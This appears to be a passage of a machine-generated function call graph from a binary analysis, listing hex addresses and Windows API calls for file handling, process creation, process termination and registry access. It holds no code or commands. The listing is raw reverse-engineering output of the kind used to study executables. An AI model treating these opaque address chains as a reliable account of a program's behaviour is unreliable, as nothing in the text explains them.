9e162d 98474->98527 98476->98472 98476->98474 98477 9e42cf FindCloseChangeNotification 98479 a3fa20 98477->98479 98479->98458 98532 9e3f0b FindCloseChangeNotification 98479->98532 98480 9e1c9c 59 API calls 98481 a3f994 98480->98481 98483 9e1900 59 API calls 98481->98483 98484 a3f9a2 98483->98484 98485 a3399c 66 API calls 98484->98485 98486 a3f9ae Mailbox 98485->98486 98486->98458 98486->98477 98488 a33a15 98487->98488 98489 a339af 98487->98489 98490 a3394d 3 API calls 98488->98490 98489->98488 98491 a339b4 98489->98491 98505 a339fd Mailbox 98490->98505 98492 a33a09 98491->98492 98493 a339be 98491->98493 98550 a33a35 62 API calls Mailbox 98492->98550 98495 a339de 98493->98495 98496 a339c8 98493->98496 98497 9e40cd 59 API calls 98495->98497 98536 9e40cd 98496->98536 98499 a339e6 98497->98499 98549 a338e0 61 API calls Mailbox 98499->98549 98503 a339dc 98533 a3397e 98503->98533 98505->98486 98507 a38cd9 98506->98507 98508 a38cde 98506->98508 98553 a37d6e 61 API calls 2 library calls 98507->98553 98508->98464 98554 a3384c 98510->98554 98512 a33959 WriteFile 98512->98486 98513->98457 98515 9e42cf FindCloseChangeNotification 98514->98515 98516 9e3e53 98515->98516 98563 9e42f9 98516->98563 98518 9e3e72 98524 9e3e95 98518->98524 98571 9e3c61 62 API calls Mailbox 98518->98571 98520 9e3e84 98572 9e389f 98520->98572 98523 a3394d 3 API calls 98523->98524 98524->98455 98524->98468 98525->98458 98526->98455 98528 9f0fe6 Mailbox 59 API calls 98527->98528 98529 9e1652 98528->98529 98530 9f0fe6 Mailbox 59 API calls 98529->98530 98531 9e1660 98530->98531 98531->98480 98532->98458 98534 a3394d 3 API calls 98533->98534 98535 a33990 98534->98535 98535->98505 98537 9f0fe6 Mailbox 59 API calls 98536->98537 98538 9e40e0 98537->98538 98539 9e1c7e 59 API calls 98538->98539 98540 9e40ed 98539->98540 98541 9e402a WideCharToMultiByte 98540->98541 98542 9e404e 98541->98542 98543 9e4085 98541->98543 98544 9f0fe6 Mailbox 59 API calls 98542->98544 98552 9e3f20 59 API calls Mailbox 98543->98552 98546 9e4055 WideCharToMultiByte 98544->98546 98551 9e3f79 59 API calls 2 library calls 98546->98551 98548 9e4077 98548->98503 98549->98503 98550->98505 98551->98548 98552->98548 98553->98508 98555 a33853 98554->98555 98556 a3385e 98554->98556 98561 9e42ae SetFilePointerEx 98555->98561 98556->98512 98558 a338b8 SetFilePointerEx 98562 9e42ae SetFilePointerEx 98558->98562 98560 a338d7 98560->98512 98561->98558 98562->98560 98564 9e4312 CreateFileW 98563->98564 98565 a206fc 98563->98565 98568 9e4334 98564->98568 98566 a20702 CreateFileW 98565->98566 98565->98568 98567 a20728 98566->98567 98566->98568 98576 9e410a 98567->98576 98568->98518 98571->98520 98573 9e38a8 98572->98573 98574 9e38b5 98572->98574 98575 9e410a 2 API calls 98573->98575 98574->98523 98574->98524 98575->98574 98583 9e4124 98576->98583 98577 9e41ab SetFilePointerEx 98584 9e42ae SetFilePointerEx 98577->98584 98580 a206cc 98585 9e42ae SetFilePointerEx 98580->98585 98581 9e417f 98581->98568 98582 a206e6 98583->98577 98583->98580 98583->98581 98584->98581 98585->98582 98587 9d4d37 84 API calls 98586->98587 98588 a4d203 98587->98588 98592 a4d24a Mailbox 98588->98592 98624 a4de8e 98588->98624 98590 a4d617 98674 a4dfb1 92 API calls Mailbox 98590->98674 98592->98262 98594 a4d626 98596 a4d4b0 98594->98596 98597 a4d632 98594->98597 98595 a4d29b Mailbox 98595->98592 98598 9d4d37 84 API calls 98595->98598 98611 a4d4a2 98595->98611 98657 a3fc0d 59 API calls 2 library calls 98595->98657 98658 a4d6c8 61 API calls 2 library calls 98595->98658 98637 a4d057 98596->98637 98597->98592 98598->98595 98603 a4d4e9 98652 9f0e38 98603->98652 98606 a4d503 98659 a3a48d 89 API calls 4 library calls 98606->98659 98607 a4d51c 98660 9d47be 98607->98660 98610 a4d50e GetCurrentProcess TerminateProcess 98610->98607 98611->98590 98611->98596 98616 a4d68d 98616->98592 98619 a4d6a1 FreeLibrary 98616->98619 98617 a4d554 98672 a4dd32 107 API calls _free 98617->98672 98619->98592 98622 9d523c 59 API calls 98623 a4d565 98622->98623 98623->98616 98623->98622 98673 9d4230 59 API calls Mailbox 98623->98673 98675 a4dd32 107 API calls _free 98623->98675 98625 9e1aa4 59 API calls 98624->98625 98626 a4dea9 CharLowerBuffW 98625->98626 98676 a2f903 98626->98676 98630 9e1207 59 API calls 98631 a4dee2 98630->98631 98683 9e1462 98631->98683 98633 a4def9 98634 9e1981 59 API calls 98633->98634 98635 a4df05 Mailbox 98634->98635 98636 a4df41 Mailbox 98635->98636 98696 a4d6c8 61 API calls 2 library calls 98635->98696 98636->98595 98638 a4d072 98637->98638 98642 a4d0c7 98637->98642 98639 9f0fe6 Mailbox 59 API calls 98638->98639 98641 a4d094 98639->98641 98640 9f0fe6 Mailbox 59 API calls 98640->98641 98641->98640 98641->98642 98643 a4e139 98642->98643 98644 a4e362 Mailbox 98643->98644 98650 a4e15c _strcat _wcscpy __NMSG_WRITE 98643->98650 98644->98603 98645 9d5087 59 API calls 98645->98650 98646 9d50d5 59 API calls 98646->98650 98647 9d502b 59 API calls 98647->98650 98648 9d4d37 84 API calls 98648->98650 98649 9f593c 58 API calls _W_store_winword 98649->98650 98650->98644 98650->98645 98650->98646 98650->98647 98650->98648 98650->98649 98705 a35e42 61 API calls 2 library calls 98650->98705 98653 9f0e4d 98652->98653 98654 9f0ee5 Sleep 98653->98654 98655 9f0eb3 98653->98655 98656 9f0ed3 FindCloseChangeNotification 98653->98656 98654->98655 98655->98606 98655->98607 98656->98655 98657->98595 98658->98595 98659->98610 98661 9d47c6 98660->98661 98662 9f0fe6 Mailbox 59 API calls 98661->98662 98663 9d47d4 98662->98663 98664 9d47e0 98663->98664 98706 9d46ec 98663->98706 98666 9d4540 98664->98666 98709 9d4650 98666->98709 98668 9d454f 98669 9f0fe6 Mailbox 59 API calls 98668->98669 98670 9d45eb 98668->98670 98669->98670 98670->98623 98671 9d4230 59 API calls Mailbox 98670->98671 98671->98617 98672->98623 98673->98623 98674->98594 98675->98623 98677 a2f92e __NMSG_WRITE 98676->98677 98678 a2f963 98677->98678 98679 a2fa14 98677->98679 98682 a2f96d 98677->98682 98678->98682 98697 9e14db 98678->98697 98681 9e14db 61 API calls 98679->98681 98679->98682 98681->98679 98682->98630 98682->98635 98684 9e14ce 98683->98684 98685 9e1471 98683->98685 98686 9e1981 59 API calls 98684->98686 98685->98684 98687 9e147c 98685->98687 98692 9e149f _memmove 98686->98692 98688 9e1497 98687->98688 98689 a1f1de 98687->98689 98704 9e1b7c 59 API calls Mailbox 98688->98704 98691 9e1c7e 59 API calls 98689->98691 98693 a1f1e8 98691->98693 98692->98633 98694 9f0fe6 Mailbox 59 API calls 98693->98694 98695 a1f208 98694->98695 98696->98636 98698 9e14e9 CompareStringW 98697->98698 98703 a1f210 98697->98703 98701 9e150c 98698->98701 98700 a1f25f 98701->98678 98702 9f4eb8 60 API calls 98702->98703 98703->98700 98703->98702 98704->98692 98705->98650 98707 9f0fe6 Mailbox 59 API calls 98706->98707 98708 9d46f9 98707->98708 98708->98664 98710 9d4659 Mailbox 98709->98710 98711 a0d6ec 98710->98711 98715 9d4663 98710->98715 98712 9f0fe6 Mailbox 59 API calls 98711->98712 98714 a0d6f8 98712->98714 98713 9d466a 98713->98668 98715->98713 98716 9d5190 Mailbox 59 API calls 98715->98716 98716->98715 98718 9d5041 98717->98718 98719 9d503c 98717->98719 98718->98267 98719->98718 98839 9f37ba 59 API calls 98719->98839 98722 9e1207 59 API calls 98721->98722 98723 9f012f 98722->98723 98724 9e1207 59 API calls 98723->98724 98725 9f0137 98724->98725 98726 9e1207 59 API calls 98725->98726 98727 9f013f 98726->98727 98728 9e1207 59 API calls 98727->98728 98729 9f0147 98728->98729 98730 9f017b 98729->98730 98731 a2627d 98729->98731 98732 9e1462 59 API calls 98730->98732 98733 9e1c9c 59 API calls 98731->98733 98734 9f0189 98732->98734 98735 a26286 98733->98735 98736 9e1981 59 API calls 98734->98736 98737 9e19e1 59 API calls 98735->98737 98738 9f0193 98736->98738 98740 9f01be 98737->98740 98739 9e1462 59 API calls 98738->98739 98738->98740 98743 9f01b4 98739->98743 98741 9f01fe 98740->98741 98744 9f01dd 98740->98744 98754 a262a6 98740->98754 98742 9e1462 59 API calls 98741->98742 98746 9f020f 98742->98746 98747 9e1981 59 API calls 98743->98747 98840 9e1609 98744->98840 98750 9f0221 98746->98750 98752 9e1c9c 59 API calls 98746->98752 98747->98740 98748 a26376 98751 9e1821 59 API calls 98748->98751 98753 9f0231 98750->98753 98758 9e1c9c 59 API calls 98750->98758 98767 a26333 98751->98767 98752->98750 98756 9f0238 98753->98756 98759 9e1c9c 59 API calls 98753->98759 98754->98748 98755 a2635f 98754->98755 98766 a262dd 98754->98766 98755->98748 98763 a2634a 98755->98763 98760 9e1c9c 59 API calls 98756->98760 98769 9f023f Mailbox 98756->98769 98757 9e1462 59 API calls 98757->98741 98758->98753 98759->98756 98760->98769 98761 9e1609 59 API calls 98761->98767 98762 a2633b 98764 9e1821 59 API calls 98762->98764 98765 9e1821 59 API calls 98763->98765 98764->98767 98765->98767 98766->98762 98770 a26326 98766->98770 98767->98741 98767->98761 98843 9e153b 59 API calls 2 library calls 98767->98843 98769->98281 98771 9e1821 59 API calls 98770->98771 98771->98767 98773 a1f401 98772->98773 98774 9e17f2 98772->98774 98850 a287f9 59 API calls _memmove 98773->98850 98844 9e1680 98774->98844 98777 9e17fe 98777->98284 98777->98292 98778 a1f40b 98779 9e1c9c 59 API calls 98778->98779 98780 a1f413 Mailbox 98779->98780 98782 9e133d 59 API calls 98781->98782 98783 a33f52 GetFileAttributesW 98782->98783 98784 a33f66 GetLastError 98783->98784 98787 a33f7f Mailbox 98783->98787 98785 a33f73 CreateDirectoryW 98784->98785 98786 a33f81 98784->98786 98785->98786 98785->98787 98786->98787 98788 9e1981 59 API calls 98786->98788 98787->98292 98789 a33fc3 98788->98789 98790 a33f1d 59 API calls 98789->98790 98791 a33fcc 98790->98791 98791->98787 98792 a33fd0 CreateDirectoryW 98791->98792 98792->98787 98794 9e1207 59 API calls 98793->98794 98795 a33cff 98794->98795 98796 9e1207 59 API calls 98795->98796 98797 a33d07 98796->98797 98798 9e1207 59 API calls 98797->98798 98799 a33d0f 98798->98799 98800 9e1207 59 API calls 98799->98800 98801 a33d17 98800->98801 98802 9f0284 60 API calls 98801->98802 98803 a33d21 98802->98803 98804 9f0284 60 API calls 98803->98804 98805 a33d2b 98804->98805 98851 a34f82 98805->98851 98807 a33d36 98862 a34fec GetFileAttributesW 98807->98862 98810 a33d53 98812 a34fec GetFileAttributesW 98810->98812 98811 9e1900 59 API calls 98811->98810 98814 a33d5b 98812->98814 98813 a33d68 98815 9e1207 59 API calls 98813->98815 98814->98813 98816 9e1900 59 API calls 98814->98816 98817 a33d70 98815->98817 98816->98813 98818 9e1207 59 API calls 98817->98818 98819 a33d78 98818->98819 98820 9f0119 59 API calls 98819->98820 98821 a33d89 FindFirstFileW 98820->98821 98822 a33eb4 FindClose 98821->98822 98835 a33dac Mailbox 98821->98835 98828 a33ebe Mailbox 98822->98828 98823 a33e88 FindNextFileW 98823->98835 98824 9e1a36 59 API calls 98824->98835 98826 9e1c9c 59 API calls 98826->98835 98827 9e17e0 59 API calls 98827->98835 98828->98287 98829 9e1900 59 API calls 98829->98835 98830 a3412a 3 API calls 98830->98835 98831 a33eab FindClose 98831->98828 98832 a33e2a 98836 a33e4e MoveFileW 98832->98836 98837 a33e3e DeleteFileW 98832->98837 98918 9e151f 98832->98918 98833 a33ef7 CopyFileExW 98833->98835 98835->98822 98835->98823 98835->98824 98835->98826 98835->98827 98835->98829 98835->98830 98835->98831 98835->98832 98835->98833 98838 a33e6b DeleteFileW 98835->98838 98864 a34561 98835->98864 98836->98835 98837->98835 98838->98835 98839->98718 98841 9e1aa4 59 API calls 98840->98841 98842 9e1614 98841->98842 98842->98741 98842->98757 98843->98767 98845 9e1692 98844->98845 98848 9e16ba _memmove 98844->98848 98846 9f0fe6 Mailbox 59 API calls 98845->98846 98845->98848 98847 9e176f _memmove 98846->98847 98849 9f0fe6 Mailbox 59 API calls 98847->98849 98848->98777 98849->98847 98850->98778 98852 9e1207 59 API calls 98851->98852 98853 a34f97 98852->98853 98854 9e1207 59 API calls 98853->98854 98855 a34f9f 98854->98855 98856 9f0119 59 API calls 98855->98856 98857 a34fae 98856->98857 98858 9f0119 59 API calls 98857->98858 98859 a34fbe 98858->98859 98860 9e151f 61 API calls 98859->98860 98861 a34fce Mailbox 98860->98861 98861->98807 98863 a33d41 98862->98863 98863->98810 98863->98811 98865 a3457d 98864->98865 98866 a34582 98865->98866 98867 a34590 98865->98867 98868 9e1c9c 59 API calls 98866->98868 98869 9e1207 59 API calls 98867->98869 98870 a3458b Mailbox 98868->98870 98871 a34598 98869->98871 98870->98835 98872 9e1207 59 API calls 98871->98872 98873 a345a0 98872->98873 98874 9e1207 59 API calls 98873->98874 98875 a345ab 98874->98875 98876 9e1207 59 API calls 98875->98876 98877 a345b3 98876->98877 98878 9e1207 59 API calls 98877->98878 98879 a345bb 98878->98879 98880 9e1207 59 API calls 98879->98880 98881 a345c3 98880->98881 98882 9e1207 59 API calls 98881->98882 98883 a345cb 98882->98883 98884 9e1207 59 API calls 98883->98884 98885 a345d3 98884->98885 98886 9f0119 59 API calls 98885->98886 98887 a345ea 98886->98887 98888 9f0119 59 API calls 98887->98888 98889 a34603 98888->98889 98890 9e1609 59 API calls 98889->98890 98891 a3460f 98890->98891 98892 a34622 98891->98892 98893 9e1981 59 API calls 98891->98893 98894 9e1609 59 API calls 98892->98894 98893->98892 98919 9e14db 61 API calls 98918->98919 98920 9e1537 98919->98920 98920->98832 98924 a34131 98923->98924 98925 a34965 FindFirstFileW 98923->98925 98924->98118 98925->98924 98926 a3497a FindClose 98925->98926 98926->98924 98928 a4fda3 _memset 98927->98928 98929 a4fde0 98928->98929 98930 a4fe0a 98928->98930 98931 9d502b 59 API calls 98929->98931 98932 9d502b 59 API calls 98930->98932 98936 a4fe2e 98930->98936 98933 a4fdeb 98931->98933 98935 a4fe00 98932->98935 98933->98936 98938 9d502b 59 API calls 98933->98938 98934 a4fe68 98937 9d4d37 84 API calls 98934->98937 98941 9d502b 59 API calls 98935->98941 98936->98934 98939 9d502b 59 API calls 98936->98939 98940 a4fe8c 98937->98940 98938->98935 98939->98934 99010 9e436a 98940->99010 98941->98936 98943 a4fe96 98944 a4fea0 98943->98944 98945 a4ff59 98943->98945 98946 9d4d37 84 API calls 98944->98946 98947 a4ff8b GetCurrentDirectoryW 98945->98947 98948 9d4d37 84 API calls 98945->98948 98949 a4feb1 98946->98949 98950 9f0fe6 Mailbox 59 API calls 98947->98950 98951 a4ff70 98948->98951 98952 9e436a 59 API calls 98949->98952 98953 a4ffb0 GetCurrentDirectoryW 98950->98953 98954 9e436a 59 API calls 98951->98954 98955 a4febb 98952->98955 98956 a4ffbd 98953->98956 98957 a4ff7a __NMSG_WRITE 98954->98957 98958 9d4d37 84 API calls 98955->98958 98960 a4fff6 98956->98960 99014 9d4f98 98956->99014 98957->98947 98957->98960 98959 a4fecc 98958->98959 98961 9e436a 59 API calls 98959->98961 98970 a50042 98960->98970 99027 a37652 8 API calls 98960->99027 98963 a4fed6 98961->98963 98965 9d4d37 84 API calls 98963->98965 98967 a4fee7 98965->98967 98966 9d4f98 59 API calls 98968 a4ffe6 98966->98968 98971 9e436a 59 API calls 98967->98971 98972 9d4f98 59 API calls 98968->98972 98974 a50114 CreateProcessW 98970->98974 98975 a5006e 98970->98975 98977 a4fef1 98971->98977 98972->98960 98973 a5000d 99028 a37561 8 API calls 98973->99028 99009 a500a7 __NMSG_WRITE 98974->99009 99030 a28ef3 76 API calls 98975->99030 98980 a4ff27 GetSystemDirectoryW 98977->98980 98984 9d4d37 84 API calls 98977->98984 98979 a50073 98982 a500a2 98979->98982 98983 a5009b 98979->98983 98986 9f0fe6 Mailbox 59 API calls 98980->98986 98981 a50028 99029 a375da 8 API calls 98981->99029 99032 a291cf 6 API calls 98982->99032 99031 a28f2e 149 API calls 4 library calls 98983->99031 98988 a4ff08 98984->98988 98990 a4ff4c GetSystemDirectoryW 98986->98990 98992 9e436a 59 API calls 98988->98992 98990->98956 98991 a500a0 98991->99009 98995 a4ff12 __NMSG_WRITE 98992->98995 98993 a50190 CloseHandle 98996 a5019e 98993->98996 99002 a501c8 98993->99002 98994 a50153 98997 a50164 GetLastError 98994->98997 98995->98956 98995->98980 99033 a37205 CloseHandle Mailbox 98996->99033 99000 a50178 98997->99000 98999 a501ce 98999->99000 99034 a3702f CloseHandle Mailbox 99000->99034 99002->98999 99005 a501fa CloseHandle 99002->99005 99005->99000 99006 a4f94e 99006->98118 99009->98993 99009->98994 99011 9e4374 __NMSG_WRITE 99010->99011 99012 9f0fe6 Mailbox 59 API calls 99011->99012 99013 9e4389 _wcscpy 99012->99013 99013->98943 99015 9d4fa8 99014->99015 99016 a0dd2b 99014->99016 99021 9f0fe6 Mailbox 59 API calls 99015->99021 99017 a0dd3c 99016->99017 99018 9e1821 59 API calls 99016->99018 99019 9e19e1 59 API calls 99017->99019 99018->99017 99020 a0dd46 99019->99020 99024 9d4fd4 99020->99024 99025 9e1207 59 API calls 99020->99025 99022 9d4fbb 99021->99022 99022->99020 99023 9d4fc6 99022->99023 99023->99024 99026 9e1a36 59 API calls 99023->99026 99024->98966 99025->99024 99026->99024 99027->98973 99028->98981 99029->98970 99030->98979 99031->98991 99032->99009 99034->99006 99036 9e1207 59 API calls 99035->99036 99037 a34024 99036->99037 99038 9e1207 59 API calls 99037->99038 99039 a3402d 99038->99039 99040 9e1207 59 API calls 99039->99040 99041 a34036 99040->99041 99042 9f0284 60 API calls 99041->99042 99043 a34041 99042->99043 99044 a34fec GetFileAttributesW 99043->99044 99045 a3404a 99044->99045 99046 a3405c 99045->99046 99047 9e1900 59 API calls 99045->99047 99048 9f0119 59 API calls 99046->99048 99047->99046 99049 a34070 FindFirstFileW 99048->99049 99050 a3408f 99049->99050 99051 a340fc FindClose 99049->99051 99050->99051 99054 a34093 99050->99054 99056 a34107 Mailbox 99051->99056 99052 a340d7 FindNextFileW 99052->99050 99052->99054 99053 9e1c9c 59 API calls 99053->99054 99054->99050 99054->99052 99054->99053 99055 9e17e0 59 API calls 99054->99055 99057 9e1900 59 API calls 99054->99057 99055->99054 99056->98303 99058 a340c8 DeleteFileW 99057->99058 99058->99052 99059 a340f3 FindClose 99058->99059 99059->99056 99060->98321 99061->98317 99063 a4a970 99062->99063 99064 a4a918 99062->99064 99063->98345 99065 9f0fe6 Mailbox 59 API calls 99064->99065 99068 a4a93a 99065->99068 99066 9f0fe6 Mailbox 59 API calls 99066->99068 99068->99063 99068->99066 99094 a2715b 59 API calls Mailbox 99068->99094 99070 a378ac 99069->99070 99072 a378e3 99069->99072 99071 9f0fe6 Mailbox 59 API calls 99070->99071 99070->99072 99071->99072 99073 a26ebc 99072->99073 99074 a26f06 99073->99074 99078 a26f1c Mailbox 99073->99078 99075 9e1a36 59 API calls 99074->99075 99075->99078 99076 a26f47 99079 a4c355 433 API calls 99076->99079 99077 a26f5a 99080 9da820 433 API calls 99077->99080 99078->99076 99078->99077 99085 a26f53 99079->99085 99083 a26f91 99080->99083 99082 a27002 99082->98372 99084 a26fdc 99083->99084 99083->99085 99087 a26fc1 99083->99087 99084->99085 99102 a3a48d 89 API calls 4 library calls 99084->99102 99103 a26cf1 59 API calls Mailbox 99085->99103 99095 a2706d 99087->99095 99089->98372 99090->98355 99091->98360 99092->98373 99093->98377 99094->99068 99096 a27085 99095->99096 99101 9e19e1 59 API calls 99096->99101 99104 a3413a 99096->99104 99107 9dec83 99096->99107 99182 a4f1b2 99096->99182 99097 a270d9 99097->99085 99101->99097 99102->99085 99103->99082 99105 a3494a 3 API calls 99104->99105 99106 a3413f 99105->99106 99106->99097 99108 9d4d37 84 API calls 99107->99108 99109 9deca2 99108->99109 99110 9d4d37 84 API calls 99109->99110 99111 9decb7 99110->99111 99112 9d4d37 84 API calls 99111->99112 99113 9decca 99112->99113 99114 9d4d37 84 API calls 99113->99114 99115 9dece0 99114->99115 99116 9e162d 59 API calls 99115->99116 99117 9decf4 99116->99117 99118 9ded19 99117->99118 99119 9d502b 59 API calls 99117->99119 99120 a15b67 99118->99120 99148 9ded43 __wopenfile 99118->99148 99119->99118 99121 9d47be 59 API calls 99120->99121 99123 a15b7a 99121->99123 99122 9def3e 99125 9d47be 59 API calls 99122->99125 99124 9d4540 59 API calls 99123->99124 99126 a15b8c 99124->99126 99128 a15d4a 99125->99128 99132 9d43d0 59 API calls 99126->99132 99160 a15bb1 99126->99160 99127 9d4d37 84 API calls 99129 9dedca 99127->99129 99130 a15d53 99128->99130 99131 a15d97 99128->99131 99133 9d4d37 84 API calls 99129->99133 99136 9d4540 59 API calls 99130->99136 99134 9d4540 59 API calls 99131->99134 99132->99160 99137 9deddf 99133->99137 99138 a15da1 99134->99138 99135 9def0c Mailbox 99135->99097 99141 a15d5e 99136->99141 99137->99122 99144 9d47be 59 API calls 99137->99144 99142 9d43d0 59 API calls 99138->99142 99140 a15c0f 99140->99122 99150 9d4540 59 API calls 99140->99150 99143 9d4d37 84 API calls 99141->99143 99145 a15dbd 99142->99145 99147 a15d70 99143->99147 99149 9dedfe 99144->99149 99158 9d4d37 84 API calls 99145->99158 99146 9d477a 59 API calls 99146->99160 99202 9e1364 59 API calls 2 library calls 99147->99202 99148->99122 99148->99127 99148->99140 99172 9dee30 __wopenfile 99148->99172 99149->99140 99153 9dee09 99149->99153 99155 a15c76 99150->99155 99152 a15d84 99156 9d477a 59 API calls 99152->99156 99157 9d4540 59 API calls 99153->99157 99154 9d43d0 59 API calls 99154->99160 99161 9d43d0 59 API calls 99155->99161 99162 a15d92 99156->99162 99163 9dee18 99157->99163 99164 a15dd8 99158->99164 99160->99135 99160->99146 99160->99154 99200 9e1364 59 API calls 2 library calls 99160->99200 99161->99172 99168 9d43d0 59 API calls 99162->99168 99165 9e19e1 59 API calls 99163->99165 99203 9e1364 59 API calls 2 library calls 99164->99203 99165->99172 99167 9d477a 59 API calls 99167->99172 99168->99135 99169 a15dec 99170 9d477a 59 API calls 99169->99170 99170->99162 99171 9d43d0 59 API calls 99171->99172 99172->99135 99172->99167 99172->99171 99173 a15cc2 99172->99173 99199 9e1364 59 API calls 2 library calls 99172->99199 99174 a15cfb 99173->99174 99175 a15cec 99173->99175 99187 9d477a 99174->99187 99201 9e153b 59 API calls 2 library calls 99175->99201 99180 a15d1c 99181 9e19e1 59 API calls 99180->99181 99181->99122 99183 9d4d37 84 API calls 99182->99183 99184 a4f1cf 99183->99184 99185 a34148 66 API calls 99184->99185 99186 a4f1de 99185->99186 99186->99097 99188 9f0fe6 Mailbox 59 API calls 99187->99188 99189 9d4787 99188->99189 99190 9d43d0 99189->99190 99191 a0d6c9 99190->99191 99193 9d43e7 99190->99193 99191->99193 99204 9d40cb 59 API calls Mailbox 99191->99204 99194 9d44ef 99193->99194 99195 9d44e8 99193->99195 99196 9d4530 99193->99196 99194->99180 99198 9f0fe6 Mailbox 59 API calls 99195->99198 99197 9d523c 59 API calls 99196->99197 99197->99194 99198->99194 99199->99172 99200->99160 99201->99122 99202->99152 99203->99169 99204->99193 99206 a34cf0 99205->99206 99207 a34d09 99205->99207 99206->99207 99210 a34d0f 99206->99210 99211 9f385c GetStringTypeW _iswctype 99206->99211 99212 9f37c3 59 API calls __wcstoi64 99207->99212 99210->98389 99211->99206 99212->99210 99214 9d3b3f 99213->99214 99215 9d3b67 99213->99215 99216 9d3b4d 99214->99216 99217 9d3b31 59 API calls 99214->99217 99215->98133 99218 9d3b53 99216->99218 99219 9d3b31 59 API calls 99216->99219 99217->99216 99218->99215 99220 9d5190 Mailbox 59 API calls 99218->99220 99219->99218 99220->99215 99221->98128 99222->98141 99224 9d6ff7 99223->99224 99225 9d6e4a 99223->99225 99228 9d74d0 99224->99228 99232 9d6fdb 99224->99232 99235 9d7076 99224->99235 99238 9d6fbb Mailbox 99224->99238 99225->99224 99227 9d6f2c 99225->99227 99225->99228 99225->99232 99231 9d6f68 99227->99231 99227->99232 99227->99235 99228->99232 99250 9d49e0 59 API calls __gmtime64_s 99228->99250 99230 a0fc1e 99234 a0fc30 99230->99234 99248 9f3f69 59 API calls __wtof_l 99230->99248 99231->99232 99231->99238 99239 a0fa71 99231->99239 99232->98177 99234->98177 99235->99230 99235->99232 99235->99238 99247 a27aad 59 API calls 99235->99247 99238->99230 99238->99232 99249 9d41c4 59 API calls Mailbox 99238->99249 99239->99232 99246 9f3f69 59 API calls __wtof_l 99239->99246 99240->98177 99241->98166 99242->98176 99243->98180 99244->98176 99245->98176 99246->99239 99247->99238 99248->99234 99249->99238 99250->99232 99251->98184 99252 9d1055 99257 9d2a19 99252->99257 99255 9f2f70 __cinit 67 API calls 99256 9d1064 99255->99256 99258 9e1207 59 API calls 99257->99258 99259 9d2a87 99258->99259 99264 9d1256 99259->99264 99261 9d2b24 99263 9d105a 99261->99263 99267 9d13f8 59 API calls 2 library calls 99261->99267 99263->99255 99268 9d1284 99264->99268 99267->99261 99269 9d1291 99268->99269 99270 9d1275 99268->99270 99269->99270 99271 9d1298 RegOpenKeyExW 99269->99271 99270->99261 99271->99270 99272 9d12b2 RegQueryValueExW 99271->99272 99273 9d12e8 RegCloseKey 99272->99273 99274 9d12d3 99272->99274 99273->99270 99274->99273 99275 9d5ff5 99299 9d5ede Mailbox _memmove 99275->99299 99276 9f0fe6 59 API calls Mailbox 99276->99299 99277 9d6a9b 99490 9da9de 433 API calls 99277->99490 99278 9d53b0 433 API calls 99278->99299 99280 a0eff9 99281 9d5190 Mailbox 59 API calls 99280->99281 99284 a0efeb 99281->99284 99282 a0f007 99502 a3a48d 89 API calls 4 library calls 99282->99502 99332 9d5569 Mailbox 99284->99332 99501 a26cf1 59 API calls Mailbox 99284->99501 99287 9d60e5 99288 a0e137 99287->99288 99295 9d63bd Mailbox 99287->99295 99303 9d6abc 99287->99303 99310 9d6152 Mailbox 99287->99310 99288->99295 99491 a27aad 59 API calls 99288->99491 99289 9e1c9c 59 API calls 99289->99299 99291 9d523c 59 API calls 99291->99299 99292 9f0fe6 Mailbox 59 API calls 99296 9d63d1 99292->99296 99294 9e1a36 59 API calls 99294->99299 99295->99292 99305 9d6426 99295->99305 99298 9d63de 99296->99298 99296->99303 99297 a4c355 433 API calls 99297->99299 99300 a0e172 99298->99300 99301 9d6413 99298->99301 99299->99276 99299->99277 99299->99278 99299->99280 99299->99282 99299->99287 99299->99289 99299->99291 99299->99294 99299->99297 99299->99303 99299->99332 99494 a37f11 59 API calls Mailbox 99299->99494 99495 a26cf1 59 API calls Mailbox 99299->99495 99492 a4c87c 85 API calls 2 library calls 99300->99492 99301->99305 99335 9d5447 Mailbox 99301->99335 99500 a3a48d 89 API calls 4 library calls 99303->99500 99493 a4c9c9 95 API calls Mailbox 99305->99493 99308 a0e19d 99308->99308 99309 9f0fe6 59 API calls Mailbox 99309->99335 99310->99284 99310->99303 99313 9d5190 Mailbox 59 API calls 99310->99313 99320 a0e2e9 VariantClear 99310->99320 99310->99332 99338 a4f1b2 91 API calls 99310->99338 99339 a4e60c 130 API calls 99310->99339 99341 a3412a 3 API calls 99310->99341 99342 a3413a 3 API calls 99310->99342 99347 9dd679 99310->99347 99387 a465ee 99310->99387 99394 a4ebba 99310->99394 99400 a3d6be 99310->99400 99445 a45e1d 99310->99445 99470 9dcfd7 99310->99470 99496 a27aad 59 API calls 99310->99496 99311 a0e691 99497 a3a48d 89 API calls 4 library calls 99311->99497 99312 a0f165 99504 a3a48d 89 API calls 4 library calls 99312->99504 99313->99310 99316 9d6e30 60 API calls 99316->99335 99317 a0e6a0 99318 9e1c9c 59 API calls 99318->99335 99319 9d69fa 99321 9e1c9c 59 API calls 99319->99321 99320->99310 99321->99332 99322 9d69ff 99322->99311 99322->99312 99324 a0ea9a 99326 9e1c9c 59 API calls 99324->99326 99326->99332 99327 9e1207 59 API calls 99327->99335 99328 a0eb67 99328->99332 99498 a27aad 59 API calls 99328->99498 99329 a27aad 59 API calls 99329->99335 99330 9f2f70 67 API calls __cinit 99330->99335 99333 a0ef28 99499 a3a48d 89 API calls 4 library calls 99333->99499 99335->99309 99335->99311 99335->99316 99335->99318 99335->99319 99335->99322 99335->99324 99335->99327 99335->99328 99335->99329 99335->99330 99335->99332 99335->99333 99336 9d5a1a 99335->99336 99489 9d7e50 433 API calls 2 library calls 99335->99489 99503 a3a48d 89 API calls 4 library calls 99336->99503 99338->99310 99339->99310 99341->99310 99342->99310 99348 9d4f98 59 API calls 99347->99348 99349 9dd691 99348->99349 99351 9f0fe6 Mailbox 59 API calls 99349->99351 99353 a15068 99349->99353 99352 9dd6aa 99351->99352 99355 9dd6ba 99352->99355 99522 9e3df7 60 API calls Mailbox 99352->99522 99354 9dd6df 99353->99354 99527 a3fbb7 59 API calls 99353->99527 99358 9d502b 59 API calls 99354->99358 99362 9dd6ec 99354->99362 99357 9d4d37 84 API calls 99355->99357 99359 9dd6c8 99357->99359 99360 a150b0 99358->99360 99361 9e3e47 67 API calls 99359->99361 99360->99362 99363 a150b8 99360->99363 99364 9dd6d7 99361->99364 99505 9e41d6 99362->99505 99366 9d502b 59 API calls 99363->99366 99364->99353 99364->99354 99526 9e3f0b FindCloseChangeNotification 99364->99526 99368 9dd6f3 99366->99368 99369 9dd70d 99368->99369 99370 a150ca 99368->99370 99371 9e1207 59 API calls 99369->99371 99372 9f0fe6 Mailbox 59 